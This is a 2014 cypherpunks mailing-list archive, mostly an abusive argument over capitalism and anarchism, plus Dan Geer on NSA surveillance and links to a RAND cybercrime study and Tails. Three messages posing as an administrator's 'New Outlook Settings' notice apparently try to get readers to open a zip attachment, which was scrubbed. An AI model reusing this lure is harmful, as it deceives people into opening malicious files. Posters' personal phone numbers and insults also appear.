cancer in uganda you have a 10% chance of having access to morphine ... they give cancer patients paracetamol ... thats your great capitalism i find it disgusting > > the careerist journalists laura poitras et al are capitalistic in > > every way - exploitive > > I disagree. The careerist journalists are "crony capitalists" in every > way. listen i am an activist journalist making money / becoming famous like them off of journalism in the way they do it is not ok with me its not how i would ever in a million years do my work > They know that, regardless of the accuracy of their information, > the 'other side of the coin' will smooth things over and keep the > public hooked on an inferior product. That's not a true capitalist. > > i think your an idealist actually 'true capitalism' thats a theory > That's one of my main arguments with socialists and other > non-capitalist believers: BELIEVERS????????? LMAO i dont believe in belief that is religious > they point to our current system and say > 'see, it's exploitive and hurts people!' and it does. But that's not a > true capitalist system. Will we ever actually have one? Doubtful. But > what we have now is definitely not a good example. > i dont think you understand that capitalism is well beyond an economy - watch naomi klein https://www.youtube.com/watch?v=Ka3Pb_StJn4 with capitalism the iraq invasion happened within its frame black sites torture sites around the globe where conducted within the frame of capitalism > gitmo 'lives' inside the frame of capitalism i dont think you understand anarchy or anarchistic thought processies at all > > Cypher > -----BEGIN PGP SIGNATURE----- > Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/ > > iQIcBAEBCgAGBQJTPb3RAAoJEFuutbL6JoJrreMP/2KZxGQREZXNWS7Gn1ptqY5N > zccAmaF7qqTsF24fTCrwQsTR7YdxyCkSWNS6pOI0zNKYGJbTaGAeRj/WEc96vw4H > zIJyIqFACM8ZGP1VAGnMigw9jWBETOADfH+xY9ifgna/hh+C+PRLWkwYJvMbmMJX > mrbrQhBV2LAzl2XTmQBRs5NBZsxbwD9E0FXBRJjQD6AJ9GX+caP4ZJqaDK0Wur2w > mC5YYTa4d49v8/rxQ2u3uOBZr2pdmUcNQNX8wYf5uDk57TYXP/7fyuQtaTK96Jox > O/CE+3RIk1b1sjOrwz9xkiO9Vug42p+YzPv4q3WcjNao/H8l1zaIMc6hP5vrhhEv > 6jAuDH3tU4IkIULmt9VZWy62JuHN2u9PV039dUINFbmlWWGHxFLh7KdYfvJBjx4D > R8ykVdo+ROmpVRyB4QmsbtiyQ4Lur7AaCAlMSpITjVlF2sraDbdO3HfHDhnHIaKc > xuAtAs09Gqtmx7Omk6YSd1GugDjIHGmOApIbMdfFgV6weo3VsK/c0qsmTWv9dgH6 > LNHBkcNDkfCxiPemzrzqnIKwfBGan2HqiFGff9K0ATjFuK/2Rb+xDtTwwfv2sAbs > ohuhrA5A0MHqryXJDEFaP5bv+zHoRd/I7V08hijxTLKo/0VdCR89R8GAs5eOYBjj > nQffL5/0Ikn7v95ez7z7 > =zHw7 > -----END PGP SIGNATURE----- > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 7705 bytes Desc: not available URL: From shelley at misanthropia.info Thu Apr 3 22:28:08 2014 From: shelley at misanthropia.info (shelley at misanthropia.info) Date: Thu, 03 Apr 2014 22:28:08 -0700 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <20140404042502.7DA6C2280B0@palinka.tinho.net> References: <20140404042502.7DA6C2280B0@palinka.tinho.net> Message-ID: <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com> On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote: >you can take my word, if you like No offense meant to you personally Dan, because I don't know you, but- I don't trust the word of anyone from In-Q-Tel in matters such as these. -Shelley > Responding to various, > > Google up Geoff Stone; he's a Constitutional lawyer, clerked for > Brennan, was Dean of the Law School and then Provost of U Chicago. > His relationship with President Obama may well result in Obama's > Presidential Library coming to U Chicago. Maybe that is comforting. > Maybe that feeds your conclusions about how broad The Conspiracy is. > > All of which is irrelevant except that you can take my word, if you > like, that he is neither a pushover nor a hired hand. The same, > of course, can be said for all the members of Obama's special > commission. In my view, the question on the table is means and > ends. I observe an American public that is trending toward ever > more risk aversion. If my observation is correct, then you know > well that it will concentrate power because risk aversion begets a > demand for absolute safety requires absolute power and absolute > power corrupts absolutely. > > If I may quote another man I hold in personal regard, Joel Brenner's > (Google him, too) insight is this: > > During the Cold War, our enemies were few and we knew who they > were. The technologies used by Soviet military and intelligence > agencies were invented by those agencies. Today, our adversaries > are less awesomely powerful than the Soviet Union, but they are > many and often hidden. That means we must find them before we > can listen to them. Equally important, virtually every government > on Earth, including our own, has abandoned the practice of relying > on government-developed technologies. Instead they rely on > commercial off-the-shelf, or COTS, technologies. They do it > because no government can compete with the head-spinning advances > emerging from the private sector, and no government can afford > to try. When NSA wanted to collect intelligence on the Soviet > government and military, the agency had to steal or break the > encryption used by them and nobody else. The migration to COTS > changed that. If NSA now wants to collect against a foreign > general's or terorist's communications, it must break the same > encryption you and I use on our own devices... That's why NSA > would want to break the encryption used on every one of those > media. If it couldn't, any terrorist in Chicago, Kabul, or > Cologne would simply use a Blackberry or send messages on Yahoo! > But therein lies a policy dilemma, because NSA could decrypt > almost any private conversation. The distinction between > capabilities and actual practices is more critical than ever... > Like it or not, the dilemma can be resolved only through oversight > mechanisms that are publicly understood and trusted -- but are > not themselves ... transparent. > > I fear we are on the edge of a rat-hole here. I forwarded Geoff's > remarks as they are relevant, timely, and speak to the absence of > simplistic nostrums in such matters, both because of the rising > popular / political demand for comfort-and-safety and because the > technologies that those charged with delivering comfort and safety > use are COTS technologies. And dual use. Personally, I think of > surveillance as just another tax, which you may safely assume is > said through clenched libertarian cum Tea Party teeth. > > --dan > From dan at geer.org Thu Apr 3 21:25:02 2014 From: dan at geer.org (dan at geer.org) Date: Fri, 04 Apr 2014 00:25:02 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: Your message of "Wed, 02 Apr 2014 20:29:47 PDT." Message-ID: <20140404042502.7DA6C2280B0@palinka.tinho.net> Responding to various, Google up Geoff Stone; he's a Constitutional lawyer, clerked for Brennan, was Dean of the Law School and then Provost of U Chicago. His relationship with President Obama may well result in Obama's Presidential Library coming to U Chicago. Maybe that is comforting. Maybe that feeds your conclusions about how broad The Conspiracy is. All of which is irrelevant except that you can take my word, if you like, that he is neither a pushover nor a hired hand. The same, of course, can be said for all the members of Obama's special commission. In my view, the question on the table is means and ends. I observe an American public that is trending toward ever more risk aversion. If my observation is correct, then you know well that it will concentrate power because risk aversion begets a demand for absolute safety requires absolute power and absolute power corrupts absolutely. If I may quote another man I hold in personal regard, Joel Brenner's (Google him, too) insight is this: During the Cold War, our enemies were few and we knew who they were. The technologies used by Soviet military and intelligence agencies were invented by those agencies. Today, our adversaries are less awesomely powerful than the Soviet Union, but they are many and often hidden. That means we must find them before we can listen to them. Equally important, virtually every government on Earth, including our own, has abandoned the practice of relying on government-developed technologies. Instead they rely on commercial off-the-shelf, or COTS, technologies. They do it because no government can compete with the head-spinning advances emerging from the private sector, and no government can afford to try. When NSA wanted to collect intelligence on the Soviet government and military, the agency had to steal or break the encryption used by them and nobody else. The migration to COTS changed that. If NSA now wants to collect against a foreign general's or terorist's communications, it must break the same encryption you and I use on our own devices... That's why NSA would want to break the encryption used on every one of those media. If it couldn't, any terrorist in Chicago, Kabul, or Cologne would simply use a Blackberry or send messages on Yahoo! But therein lies a policy dilemma, because NSA could decrypt almost any private conversation. The distinction between capabilities and actual practices is more critical than ever... Like it or not, the dilemma can be resolved only through oversight mechanisms that are publicly understood and trusted -- but are not themselves ... transparent. I fear we are on the edge of a rat-hole here. I forwarded Geoff's remarks as they are relevant, timely, and speak to the absence of simplistic nostrums in such matters, both because of the rising popular / political demand for comfort-and-safety and because the technologies that those charged with delivering comfort and safety use are COTS technologies. And dual use. Personally, I think of surveillance as just another tax, which you may safely assume is said through clenched libertarian cum Tea Party teeth. --dan From tpb-crypto at laposte.net Thu Apr 3 15:32:11 2014 From: tpb-crypto at laposte.net (tpb-crypto at laposte.net) Date: Fri, 04 Apr 2014 00:32:11 +0200 Subject: Geoff Stone, Obama's Review Group In-Reply-To: References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> Message-ID: <966007728.44996.1396564331597.JavaMail.www@wwinf8313> > Message du 03/04/14 23:19 > De : "Cari Machet" > A : "Cypher" > Copie à : "cpunks" > Objet : Re: Geoff Stone, Obama's Review Group > > On Thu, Apr 3, 2014 at 8:00 PM, Cypher wrote: > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA512 > > > > On 04/03/2014 02:48 PM, Cari Machet wrote: > > > > > > > > > > > > On Thu, Apr 3, 2014 at 3:34 PM, > > > wrote: > > > > > >> Message du 03/04/14 16:54 De : "Cari Machet" > > >> > > >>> Not that journalists should be expected to make a lasting > > >>> difference. > > >>> > > >>> > > >> WTF? > > >> > > >> this shit was posted on huffington post probably for those > > >> without ad blocker there was ad with bewbs on it next to the > > >> text > > >> > > >> one more thing why do you assume to know the minds of the people > > > that own > > >> the snowden data - they are capitalists - that is all > > >> > > > > > > Do capitalists upset you? > > > > > > > > > CAPITALISTS have no concept of reality and are completely self > > > serving yes that is upsetting to my sensibilities and > > > consciousness > > > > Which is *precisely* why I would trust information provided to me by a > > capitalist than that provided to me by an idealist. > > > i am a fucking anarchist which by the words you use in your writing that > point to your low level concepts - you probably have no clue about > > you are a capitalist - making frames for others to fit your fucking lame > ass argument - pathetic > Cari, You have been making frames for others all along in your rants, why is it so unacceptable when someone else uses the same device on you? You are mixing our profession and your wishful thinking and opinions. The two must be separate. Your job is to report facts, not your personal opinions. The fact that you are not willing to do your job properly when compared to other journalists is what puts Laura Poitras ahead of you and makes her famous and rich ... and you green of envy. Remember to take your meds - made my capitalists - once in a while, we would all be thankful if you do. From l at odewijk.nl Thu Apr 3 16:51:32 2014 From: l at odewijk.nl (=?UTF-8?Q?Lodewijk_andr=C3=A9_de_la_porte?=) Date: Fri, 4 Apr 2014 01:51:32 +0200 Subject: TROLL ALERT!!(cari machet our resident soft in the head fake indian leftist) In-Reply-To: <1575193.mOTzX8i2Ad@lap> References: <1575193.mOTzX8i2Ad@lap> Message-ID: Logic and rationality stand on their own feet and need not be supported by any entity whatsoever, lest it may not be considered logical or reasonable. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 203 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 3 21:21:39 2014 From: Administrator at jfet.org (Administrator at jfet.org) Date: 4 Apr 2014 04:21:39 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6337 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 3 21:27:36 2014 From: Administrator at jfet.org (Administrator at jfet.org) Date: 4 Apr 2014 04:27:36 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6337 bytes Desc: not available URL: From Administrator at jfet.org Thu Apr 3 21:27:38 2014 From: Administrator at jfet.org (Administrator at jfet.org) Date: 4 Apr 2014 04:27:38 GMT Subject: Important - New Outlook Settings Message-ID: Please carefully read the attached instructions before updating settings. This e-mail and / or any attachment(s) is intended solely for the above-mentioned recipient(s) and it may contain confidential or privileged information. If you have received it in error, please notify us immediately at helpdesk at jfet.org and delete the e-mail. You must not copy it, distribute it, disclose it or take any action in reliance on it. -------------- next part -------------- A non-text attachment was scrubbed... Name: OutlookSettings.zip Type: application/zip Size: 6337 bytes Desc: not available URL: From gfoster at entersection.org Fri Apr 4 05:57:09 2014 From: gfoster at entersection.org (Gregory Foster) Date: Fri, 04 Apr 2014 07:57:09 -0500 Subject: RAND study on "Markets for Cybercrime Tools and Stolen Data" Message-ID: <533EAC25.8050406@entersection.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 RAND National Security Research Division (2014) - "Markets for Cybercrime Tools and Stolen Data: Hackers' Bazaar" by Lillian Ablon, Martin C. Libicki, Andrea A. Golay: http://www.rand.org/content/dam/rand/pubs/research_reports/RR600/RR610/RAND_RR610.pdf HT Cyber Security Law and Policy Blog (Apr 2): http://blog.cybersecuritylaw.us/2014/04/02/rand-corporation-releases-report-on-markets-for-cybercrime-tools-and-stolen-data/ gf - -- Gregory Foster || gfoster at entersection.org @gregoryfoster <> http://entersection.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.19 (Darwin) Comment: GPGTools - http://gpgtools.org iQIcBAEBCgAGBQJTPqwjAAoJEMaAACmjGtgj4z8P/3AD6XfqlqAUKDCJ1fyAqy16 gEHylffMmt7IVjUTahi9onYDDpyI2tVEsPuJCANnqEfu/70LTLSOZimSl7uwNP1x nPMc8JjgztotWoU9jPD/r99PIp5qSmeN0VSaryVYEgihpsmZqit9/oIqKLx8xltf a+wNwn4EFAgzTsZpTxXGt/6Aki29f6MEnU1bZjpzaudN5PwXZ97gX2MZtZXOBM54 OlNW/J0E3VWXAyJ8Sx9Au5gTOOGCS3EebwAJSBeHbqwCvmcHW9rgpB1Fbny1XU8K QiM5GFM9oTEmAzdFeTvOZtwHP7hQ6/gO4dI3y3u9Vc0hgK6wycjU4wlOn8ab0SxP yAD/1UI+iXHGYbGDCHwNFAZFXae+SAJI0DxToaTPVQMVkyjW5CwoM1jlijAXxrg7 41YwZTDOLV3txNBD83MVToeAfpjBoU6MDm43rHKYfowTqykuFkATlCERxrT5igGJ 5N3RFLJMFUgrn/2MxaMRRswynHRGabq/H0T0DPwVN4s74X9A+oI5sOWCtsvgO44W FqkKq9LEOCARbobF87jGNSAph5DXQ6MZmGfUrp+IRQQrMIKLBevo+6oHfpwrjZ+t pL5/2BtPJXErl8wvnjmXRmm1R4JEeC21baTwdUXu7u7QGBTmo7lij9UkjTJk5jC/ r/tw1VwX6Ex9yemiitLV =rLdn -----END PGP SIGNATURE----- From carimachet at gmail.com Fri Apr 4 02:11:29 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 09:11:29 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533DCBB6.8080902@loom.cc> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DCBB6.8080902@loom.cc> Message-ID: On Thu, Apr 3, 2014 at 8:59 PM, Patrick Chkoreff wrote: > Cari Machet wrote, On 04/03/2014 03:48 PM: > > > nobody 'owns' anything > > Ownership is an exclusive right of use or disposal. If I wake up one > morning and find you in my house eating my food, you-gonna be in big > trouble Lucy. > > its a lie you tell yourself - you were told its true its not ever heard of eminent domain ? ever heard of israel? lets not even talk about your paycheck -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 1834 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 02:15:57 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 09:15:57 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <966007728.44996.1396564331597.JavaMail.www@wwinf8313> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <966007728.44996.1396564331597.JavaMail.www@wwinf8313> Message-ID: On Thu, Apr 3, 2014 at 10:32 PM, wrote: > > Message du 03/04/14 23:19 > > De : "Cari Machet" > > A : "Cypher" > > Copie à : "cpunks" > > Objet : Re: Geoff Stone, Obama's Review Group > > > > > On Thu, Apr 3, 2014 at 8:00 PM, Cypher wrote: > > > > > -----BEGIN PGP SIGNED MESSAGE----- > > > Hash: SHA512 > > > > > > On 04/03/2014 02:48 PM, Cari Machet wrote: > > > > > > > > > > > > > > > > On Thu, Apr 3, 2014 at 3:34 PM, > > > wrote: > > > > > > > >> Message du 03/04/14 16:54 De : "Cari Machet" > > > >> > > > >>> Not that journalists should be expected to make a lasting > > > >>> difference. > > > >>> > > > >>> > > > >> WTF? > > > >> > > > >> this shit was posted on huffington post probably for those > > > >> without ad blocker there was ad with bewbs on it next to the > > > >> text > > > >> > > > >> one more thing why do you assume to know the minds of the people > > > > that own > > > >> the snowden data - they are capitalists - that is all > > > >> > > > > > > > > Do capitalists upset you? > > > > > > > > > > > > CAPITALISTS have no concept of reality and are completely self > > > > serving yes that is upsetting to my sensibilities and > > > > consciousness > > > > > > Which is *precisely* why I would trust information provided to me by a > > > capitalist than that provided to me by an idealist. > > > > > > i am a fucking anarchist which by the words you use in your writing that > > point to your low level concepts - you probably have no clue about > > > > you are a capitalist - making frames for others to fit your fucking lame > > ass argument - pathetic > > > > Cari, > > You have been making frames for others all along in your rants, why is it > so unacceptable when someone else uses the same device on you? > > You are mixing our profession and your wishful thinking and opinions. The > two must be separate. Your job is to report facts, not your personal > opinions. > > The fact that you are not willing to do your job properly when compared to > other journalists is what puts Laura Poitras ahead of you and makes her > famous and rich ... and you green of envy. > > Remember to take your meds - made my capitalists - once in a while, we > would all be thankful if you do. > when people have no argument they resort to name calling and character assassination - maybe you should ask more of yourself this level your on is really boring and predictable you dont know anything about journalism past mayb the stone age -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 4349 bytes Desc: not available URL: From carimachet at gmail.com Fri Apr 4 02:21:12 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 09:21:12 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com> References: <20140404042502.7DA6C2280B0@palinka.tinho.net> <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com> Message-ID: On Fri, Apr 4, 2014 at 5:28 AM, wrote: > On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote: > > >you can take my word, if you like > > No offense meant to you personally Dan, because I don't know you, but- I > don't trust the word of anyone from In-Q-Tel in matters such as these. > > -Shelley > and a constitutional lawyer is in the fucking white house murdering no strike that assassinating us citizens on foreign soil with drone strikes and he is a fucking supposed scholar - the upper echelon just makes itself more and more illegitimate every second just think if all that brain power had wisdom and ethics and were building instead of destroying or exploiting others your qualifications for legitimacy is at question dan > > > > Responding to various, > > > > Google up Geoff Stone; he's a Constitutional lawyer, clerked for > > Brennan, was Dean of the Law School and then Provost of U Chicago. > > His relationship with President Obama may well result in Obama's > > Presidential Library coming to U Chicago. Maybe that is comforting. > > Maybe that feeds your conclusions about how broad The Conspiracy is. > > > > All of which is irrelevant except that you can take my word, if you > > like, that he is neither a pushover nor a hired hand. The same, > > of course, can be said for all the members of Obama's special > > commission. In my view, the question on the table is means and > > ends. I observe an American public that is trending toward ever > > more risk aversion. If my observation is correct, then you know > > well that it will concentrate power because risk aversion begets a > > demand for absolute safety requires absolute power and absolute > > power corrupts absolutely. > > > > If I may quote another man I hold in personal regard, Joel Brenner's > > (Google him, too) insight is this: > > > > During the Cold War, our enemies were few and we knew who they > > were. The technologies used by Soviet military and intelligence > > agencies were invented by those agencies. Today, our adversaries > > are less awesomely powerful than the Soviet Union, but they are > > many and often hidden. That means we must find them before we > > can listen to them. Equally important, virtually every government > > on Earth, including our own, has abandoned the practice of relying > > on government-developed technologies. Instead they rely on > > commercial off-the-shelf, or COTS, technologies. They do it > > because no government can compete with the head-spinning advances > > emerging from the private sector, and no government can afford > > to try. When NSA wanted to collect intelligence on the Soviet > > government and military, the agency had to steal or break the > > encryption used by them and nobody else. The migration to COTS > > changed that. If NSA now wants to collect against a foreign > > general's or terorist's communications, it must break the same > > encryption you and I use on our own devices... That's why NSA > > would want to break the encryption used on every one of those > > media. If it couldn't, any terrorist in Chicago, Kabul, or > > Cologne would simply use a Blackberry or send messages on Yahoo! > > But therein lies a policy dilemma, because NSA could decrypt > > almost any private conversation. The distinction between > > capabilities and actual practices is more critical than ever... > > Like it or not, the dilemma can be resolved only through oversight > > mechanisms that are publicly understood and trusted -- but are > > not themselves ... transparent. > > > > I fear we are on the edge of a rat-hole here. I forwarded Geoff's > > remarks as they are relevant, timely, and speak to the absence of > > simplistic nostrums in such matters, both because of the rising > > popular / political demand for comfort-and-safety and because the > > technologies that those charged with delivering comfort and safety > > use are COTS technologies. And dual use. Personally, I think of > > surveillance as just another tax, which you may safely assume is > > said through clenched libertarian cum Tea Party teeth. > > > > --dan > > > -- Cari Machet NYC 646-436-7795 carimachet at gmail.com AIM carismachet Syria +963-099 277 3243 Amman +962 077 636 9407 Berlin +49 152 11779219 Reykjavik +354 894 8650 Twitter: @carimachet 7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187 Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6024 bytes Desc: not available URL: From jya at pipeline.com Fri Apr 4 06:28:21 2014 From: jya at pipeline.com (John Young) Date: Fri, 04 Apr 2014 09:28:21 -0400 Subject: [cryptography] Tails In-Reply-To: <533EAF1C.6090006@iang.org> References: <533EAF1C.6090006@iang.org> Message-ID: Informative tweets on Tails security since the fund-raising announcement: http://cryptome.org/2014/04/tails-security.pdf At 09:09 AM 4/4/2014, you wrote: >Has anyone looked at Tails? > >http://www.salon.com/2014/04/02/crucial_encryption_tool_enabled_nsa_reporting_on_shoestring_budget/ > > > Crucial encryption tool enabled NSA reporting on shoestring budget > >Big players in Snowden revelations publicly praise Tails, in hope of >gaining much-needed funding for the tool From dan at geer.org Fri Apr 4 06:53:11 2014 From: dan at geer.org (dan at geer.org) Date: Fri, 04 Apr 2014 09:53:11 -0400 Subject: Geoff Stone, Obama's Review Group In-Reply-To: Your message of "Thu, 03 Apr 2014 22:28:08 PDT." <1396589288.30575.102621593.20AC353F@webmail.messagingengine.com> Message-ID: <20140404135311.316F7228143@palinka.tinho.net> shelley at misanthropia.info writes: | On Thu, Apr 3, 2014, at 09:25 PM, Dan Geer wrote: | | >you can take my word, if you like | | No offense meant to you personally Dan, because I don't know you, but- I | don't trust the word of anyone from In-Q-Tel in matters such as these. | That is both perfectly fine and perfectly aligned with Geoff's remarks. --dan From carimachet at gmail.com Fri Apr 4 03:09:47 2014 From: carimachet at gmail.com (Cari Machet) Date: Fri, 4 Apr 2014 10:09:47 +0000 Subject: Geoff Stone, Obama's Review Group In-Reply-To: <533DD10D.8090005@cpunk.us> References: <20140403025616.D514A2280D8@palinka.tinho.net> <740996795.264257.1396539260669.JavaMail.www@wwinf8307> <533DBDDD.8050102@cpunk.us> <533DD10D.8090005@cpunk.us> Message-ID: On Thu, Apr 3, 2014 at 9:22 PM, Cypher wrote: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA512 > > > On 04/03/2014 03:49 PM, Cari Machet wrote: > > > > > >> Do capitalists upset you? > > > > > >> CAPITALISTS have no concept of reality and are completely self > >> serving yes that is upsetting to my sensibilities and > >> consciousness > > > > Which is *precisely* why I would trust information provided to me > > by a capitalist than that provided to me by an idealist. > > > > > >> i am a fucking anarchist which by the words you use in your > >> writing that point to your low level concepts - you probably have > >> no clue about > > > >> you are a capitalist - making frames for others to fit your > >> fucking lame ass argument - pathetic > > > Actually, Cari, I've done a pretty extensive foray into Anarchism. > It's an interesting but, IMHO, completely unworkable system populated > by people who dream of a better, freer world, but have no chance of > actually creating it - not now at least. > that shows how little you know about it for you to think of it on such monolithic terms - it already works is working in many many places and factions so... > > What turned me off about Anarchism were people like you. People who > waved their moral superiority flag every chance they got and assumed > that anyone who supported a different view than theirs was ignorant or > didn't understand what Anarchy is. In a lot of cases, Anarchists are > their own worst enemy. > your not an anarchist what was your little 'foray' - so french - do tell 1902 chicago? for your information i am a provocateur that you cannot see that again exclaims your lack of knowledge/care > > > A capitalist sees everything as a product that will either further > > his desire for success or hinder it. An idealist sees everything as > > a mission fitting within their narrow agenda. A capitalist has much > > more incentive to provide a good product (correct, accurate, > > information) than an idealist who's sole goal is to further an > > agenda. Both have their uses though and both can be manipulated to > > good and bad ends. > > > > > >> an anarchist DOES NOT generally have one goal - capitalists think > >> that way anarchists are node based thinkers capitalist are > >> monolithic thinkers and often frame things in a dualistic or > >> black and white manner which is very christian religion in form > >> and thought pattern > > Well, Cari, from what I've seen from the Anarchist community, the main > goal that anarchist have is to abolish the state. This, of course, is > a means to an end (the end being personal freedom) but the goal seems > to be nearly single-minded focus on abolishing the state. > > And yes, I know some anarchists will say 'some of us simply ignore the > state' and that's true. But, in reality, the main 'collective' goal > (and I use that term loosely) is to abolish the state. To confirm > this, just talk to any anarchist and ask them what the biggest problem > to humanity is. Most will stay 'the state'. How do you solve it? 'Work > to abolish the state'. Seems pretty single minded to me. > > But, please, instead of ranting and wild arm-waving, educate me if I > am wrong. I would certainly /love/ to see a workable, large scale, > anarchistic plan. I admit I probably don't know as much about the > philosophy as you do. But, instead of just angrily cursing, why not > try to educate me? I know that's a bit harder than angry arm-waving > and cursing but it's probably more productive. > > kool thanks its not just about the state - there are very different types of anarchists - that is part of the quality of it all the form is open - its like the concept of opensource you are right to a degree it is about personal freedom but that still frames as against the state so i would say it is more about not imposing your will on others instead wanting others to be authentically themselves and 'believe' it or not that has a lot to do with optimal production - each person has a quality like no other ... because some people have qualities that are harmful to others of course there are huge issues of justice within this model and often we are asked about justice - a lot of the community thinks on the level of restorative justice which has models in pockets of society all over the world - one example is in ecuador - the natives have a different form of justice when a crime is committed the gov police are called but then the decision is made with the community what will happen next - will the perp be taken to the government justice system or will the community deal with them - if the community deals with them then they will be asked to perform certain tasks in the community to make up for their misdeeds - some even think it is a good idea for the person to come up with the tasks themselves... look up direct democracy - there is often within our model questions regarding scalability that is often where the rubber meets the road for people - we dont know how that works exactly as it is not been sent into praxis enough but we have developed spokes councils and what happens is rotation of all aspects - all members are rotated so that it is not representative - now zizek has complained about our model that he doesnt want to participate in this kind of constant meetings he doesnt want to deal with other stuff besides his scholarly intellectual stuff ... i dont think it is a problem no one is forced to be a part - there is just no exclusion - inclusion is not mandated - so zizek is kinda not knowledgable there - what i really like is that people that work in say sanitation do a report back about what is going on to everyone and people that work in say media can be knowledgeable about what is happening in that field (there can be people that actually work in both fields of couse) but then the people in the field of media can be alerted if there is something they can do to help the field of sanitation in some way - get information out about that they need help with this project etc... information flow .... anyway i dont want to write a book here mayb listen to this - yes theres a big star and david graeber capitalist but it has real info too https://www.youtube.com/watch?v=bIv7MYS8JaE particularly i would point you to the theories of proudhon, bakunin and kropotkin >> capitalism is an economic model that has severe ramifications > >> for society it is no different than having a monarch really there > >> is a degree of difference regarding poverty but ... i heard today > >> that if you are dying of cancer in uganda you have a 10% chance > >> of having access to morphine ... they give cancer patients > >> paracetamol ... thats your great capitalism i find it disgusting > >> > Actually, that /isn't/ capitalism. Why do you think what you read is > the case? Maybe it's because of deals cut between governments and > corporations? Do you know what we call that intertwining? No, we don't > call it capitalism. We call is /fascism/. > i call it capitalism when the assistant attorney general of the united states says they made a decision not to try to convict the banks of fraud because there would be an economic hit to the u$ of a ... that is capitalism in praxis today i gotta go more later... +++++++++++++++++++++++++++ > >> the careerist journalists laura poitras et al are capitalistic > >> in every way - exploitive > > > > I disagree. The careerist journalists are "crony capitalists" in > > every way. > > > >> listen i am an activist journalist making money / becoming famous > >> like them off of journalism in the way they do it is not ok with > >> me its not how i would ever in a million years do my work > > And /that/ is one of the great things about capitalism: you can try > different things. You don't have to be confined to one narrow model. > You don't agree with it? Great! Go do something your way and nobody is > likely to stop you (except the predatory crony capitalists, but I > think we've established those aren't real capitalists, right?) > > > They know that, regardless of the accuracy of their information, > > the 'other side of the coin' will smooth things over and keep the > > public hooked on an inferior product. That's not a true > > capitalist. > > > > > >> i think your an idealist actually 'true capitalism' thats a > >> theory > > Perhaps I am. Just like a Utopian anarchistic society is a theory > that's never been proven. It's a different way of thinking, each with > positives and negatives. I think we're probably /both/ idealists in > our own ways. > > > That's one of my main arguments with socialists and other > > non-capitalist believers: > > > > > >> BELIEVERS????????? LMAO > > > >> i dont believe in belief that is religious > > You don't believe in the power of your anarchistic philosophy? Hmm, > perhaps that's the problem then! I assume, being a journalist, you > understand that words 